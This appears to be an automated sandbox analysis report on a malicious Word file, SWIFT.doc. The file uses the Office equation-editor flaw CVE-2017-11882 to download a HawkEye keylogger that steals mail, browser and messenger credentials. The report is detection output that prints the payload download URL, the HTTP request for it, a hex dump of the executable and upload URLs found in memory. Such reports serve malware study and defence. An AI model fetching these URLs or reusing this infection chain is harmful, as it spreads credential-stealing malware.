Analysis Report SWIFT.doc

Overview

General Information

Sample Name: SWIFT.doc
Analysis ID: 330287
MD5: 516028d299e8b6b9f947fdb4541a5d7e
SHA1: fa9c3d41dcd61c1dcade0ba7943882cf640a71cd
SHA256: 6de5a6a916916823583495dae424fa8ce2f54c33f2a67da83337b6f2579e816c
Tags: doc

Most interesting Screenshot:

Detection

HawkEye M00nD3v Logger MailPassView
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected HawkEye Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Yara detected AntiVM_3
Yara detected HawkEye Keylogger
Yara detected M00nD3v Logger
Yara detected MailPassView
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Searches for Windows Mail specific files
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://mangero.ga/izux/hktestfile.scr Avira URL Cloud: Label: malware
Found malware configuration
Source: vbc.exe.1492.10.memstr Malware Configuration Extractor: HawkEye {"Modules": ["mailpv"], "Version": ""}
Multi AV Scanner detection for submitted file
Source: SWIFT.doc Virustotal: Detection: 44% Perma Link
Source: SWIFT.doc ReversingLabs: Detection: 47%
Antivirus or Machine Learning detection for unpacked file
Source: 9.2.izux978537.scr.400000.1.unpack Avira: Label: TR/Dropper.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\izux978537.scr Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Spreading:

barindex
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: number of queries: 1002
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen, 10_2_0040702D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\config\systemprofile\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ Jump to behavior

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 9_2_0024A8E8
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 4x nop then mov ecx, dword ptr [ebp-38h] 9_2_0024A8E2
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 4x nop then jmp 00600DDFh 9_2_00600A88
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 4x nop then jmp 00600DDFh 9_2_00600A78
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: mangero.ga
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 46.173.221.33:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 46.173.221.33:80

Networking:

barindex
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.16.1Date: Mon, 14 Dec 2020 16:49:33 GMTContent-Length: 7447752Connection: keep-aliveLast-Modified: Mon, 14 Dec 2020 05:14:33 GMTETag: "71a4c8-5b665b7b1b004"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 02 00 f0 b4 d6 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 88 71 00 00 02 00 00 00 00 00 00 0e a6 71 00 00 20 00 00 00 c0 71 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 71 00 00 02 00 00 9a 75 72 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 a5 71 00 57 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 71 00 c8 18 00 00 00 c0 71 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 86 71 00 00 20 00 00 00 88 71 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 71 00 00 02 00 00 00 8a 71 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 a5 71 00 00 00 00 00 48 00 00 00 02 00 05 00 08 00 71 00 ac a5 00 00 03 00 00 00 02 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 1a 20 00 00 00 00 2a fa fe 09 01 00 39 30 00 00 00 28 09 00 00 06 39 18 00 00 00 fe 09 00 00 72 f6 5a 00 70 fe 09 01 00 28 1c 00 00 0a 28 1d 00 00 0a 2a fe 09 00 00 fe 09 01 00 28 14 00 00 0a 2a fe 09 00 00 2a 66 fe 09 00 00 20 0f 00 00 00 5f 20 05 00 00 00 fe 02 20 00 00 00 00 fe 01 2a 4a fe 09 00 00 20 0f 00 00 00 5f 20 05 00 00 00 fe 01 2a 4a fe 09 00 00 20 0f 00 00 00 5f 20 06 00 00 00 fe 01 2a 4a fe 09 00 00 20 0f 00 00 00 5f 20 07 00 00 00 fe 01 2a 4a fe 09 00 00 20 0f 00 00 00 5f 20 08 00 00 00 fe 01 2a 4a fe 09 00 00 20 0f 00 00 00 5f 20 0a 00 00 00 fe 01 2a 4a fe 09 00 00 20 40 00 00 00 5f 20 40 00 00 00 fe 01 2a 4a fe 09 00 00 20 10 00 00 00 5f 20 10 00 00 00 fe 01 2a a6 7f f6 00 00 04 28 0e 00 00 0a 3a 0f 00 00 00 28 25 00 00 06 73 2d 00 00 0a 80 f6 00 00 04 7f f6 00 00 04 28 0f 00 00 0a 2a a6 7f f7 00 00 04 28 0e 00 00 0a 3a 0f 00 00 00 28 26 00 00 06 73 2d 00 00 0a 80 f7 00 00 04 7f f7 00 00 04 28 0f 00 00 0a 2a 1a 28 10 00 00 0a 2a 76 28 23 00 00 06 39 0d 0
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GPI-ASRU GPI-ASRU
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /izux/hktestfile.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mangero.gaConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1A2D0E25-5575-4F65-9737-3BA52E43A74D}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /izux/hktestfile.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mangero.gaConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: mangero.ga
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp String found in binary or memory: http://bot.whatismyipaddress.com/
Source: izux978537.scr, 00000009.00000002.2379604509.000000000A600000.00000002.00000001.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: hktestfile[1].scr.2.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: hktestfile[1].scr.2.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp String found in binary or memory: http://dyn.com/dns/
Source: hktestfile[1].scr.2.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp String found in binary or memory: http://pomf.cat/upload.php
Source: izux978537.scr, 00000009.00000002.2371242328.0000000000402000.00000040.00000001.sdmp String found in binary or memory: http://pomf.cat/upload.php&https://a.pomf.cat/
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp String found in binary or memory: http://pomf.cat/upload.phpCContent-Disposition:
Source: izux978537.scr, 00000009.00000002.2379604509.000000000A600000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: izux978537.scr, 00000009.00000002.2379604509.000000000A600000.00000002.00000001.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: izux978537.scr, 00000009.00000002.2379604509.000000000A600000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: izux978537.scr, 00000009.00000002.2379604509.000000000A600000.00000002.00000001.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: vbc.exe, 0000000B.00000002.2242831512.0000000000400000.00000040.00000001.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp String found in binary or memory: https://a.pomf.cat/
Source: izux978537.scr, 00000009.00000002.2375869139.0000000002B31000.00000004.00000001.sdmp, izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp String found in binary or memory: https://m00nd3v.com/M00nD3v/HawkEyeDecrypt/BouncyCastle.Crypto.dll
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp String found in binary or memory: https://m00nd3v.com/M00nD3v/HawkEyeDecrypt/BouncyCastle.Crypto.dll;HawkEye
Source: hktestfile[1].scr.2.dr String found in binary or memory: https://sectigo.com/CPS0D

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected HawkEye Keylogger
Source: Yara match File source: 00000009.00000002.2376075790.0000000002B90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2371242328.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY
Source: Yara match File source: 9.2.izux978537.scr.400000.1.unpack, type: UNPACKEDPE
Contains functionality for read data from the clipboard
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_0040ADA4 GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA, 10_2_0040ADA4

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000009.00000002.2371163613.00000000002C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 0000000A.00000002.2248711261.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 00000009.00000002.2376075790.0000000002B90000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000009.00000002.2371242328.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 0000000B.00000002.2242831512.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 11.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 10.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 9.2.izux978537.scr.2c0000.0.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 9.2.izux978537.scr.2c0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 11.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 10.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 9.2.izux978537.scr.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 9.2.izux978537.scr.400000.1.unpack, type: UNPACKEDPE Matched rule: HawkEye v9 Payload Author: ditekshen
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\izux978537.scr Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hktestfile[1].scr Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00B13CB0 NtUnmapViewOfSection, 9_2_00B13CB0
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0024C838 9_2_0024C838
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00241108 9_2_00241108
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002489A8 9_2_002489A8
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002419B1 9_2_002419B1
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002499F9 9_2_002499F9
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002432B0 9_2_002432B0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002482F0 9_2_002482F0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00242358 9_2_00242358
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002413E0 9_2_002413E0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002404E8 9_2_002404E8
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0024A528 9_2_0024A528
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0024DE98 9_2_0024DE98
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0024703A 9_2_0024703A
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00247048 9_2_00247048
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002450EA 9_2_002450EA
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002458F9 9_2_002458F9
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0024D8CA 9_2_0024D8CA
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00245908 9_2_00245908
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00248998 9_2_00248998
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002469C8 9_2_002469C8
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002469D8 9_2_002469D8
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00244238 9_2_00244238
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00244248 9_2_00244248
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0024D2B0 9_2_0024D2B0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0024329E 9_2_0024329E
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002482E0 9_2_002482E0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00245B09 9_2_00245B09
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0024CB40 9_2_0024CB40
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00246B93 9_2_00246B93
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002454A0 9_2_002454A0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00245490 9_2_00245490
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00244DE0 9_2_00244DE0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00241DF2 9_2_00241DF2
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00244DD0 9_2_00244DD0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002456B0 9_2_002456B0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002476F9 9_2_002476F9
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_002456C0 9_2_002456C0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00247708 9_2_00247708
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B0048 9_2_005B0048
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005BC174 9_2_005BC174
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B5168 9_2_005B5168
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005BDB42 9_2_005BDB42
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B8498 9_2_005B8498
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005BD5F8 9_2_005BD5F8
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005BF728 9_2_005BF728
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B5FB0 9_2_005B5FB0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B0FA0 9_2_005B0FA0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B8858 9_2_005B8858
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005BD0B7 9_2_005BD0B7
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005BD112 9_2_005BD112
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B7A28 9_2_005B7A28
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B4C10 9_2_005B4C10
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B155E 9_2_005B155E
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B1542 9_2_005B1542
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005BCD41 9_2_005BCD41
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B152D 9_2_005B152D
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B7608 9_2_005B7608
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B6EED 9_2_005B6EED
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B6EA5 9_2_005B6EA5
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005B0FF8 9_2_005B0FF8
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0060D990 9_2_0060D990
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0060AFB0 9_2_0060AFB0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00606408 9_2_00606408
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_006010A2 9_2_006010A2
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_006010A8 9_2_006010A8
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_006059E0 9_2_006059E0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_006059D0 9_2_006059D0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_006056A8 9_2_006056A8
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0060A3E0 9_2_0060A3E0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_006063F8 9_2_006063F8
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00606FC8 9_2_00606FC8
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00606FB9 9_2_00606FB9
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00B11400 9_2_00B11400
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00B10A50 9_2_00B10A50
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00B103AD 9_2_00B103AD
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00B1319D 9_2_00B1319D
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00B113FE 9_2_00B113FE
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00B10FE0 9_2_00B10FE0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00B10FD0 9_2_00B10FD0
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_00B11F10 9_2_00B11F10
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_00404DE5 10_2_00404DE5
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_00404E56 10_2_00404E56
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_00404EC7 10_2_00404EC7
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_00404F58 10_2_00404F58
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_0040BF6B 10_2_0040BF6B
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: String function: 00412084 appears 39 times
Yara signature match
Source: 00000009.00000002.2371163613.00000000002C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 0000000A.00000002.2248711261.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 00000009.00000002.2376075790.0000000002B90000.00000004.00000001.sdmp, type: MEMORY Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000002.2371242328.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000B.00000002.2242831512.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
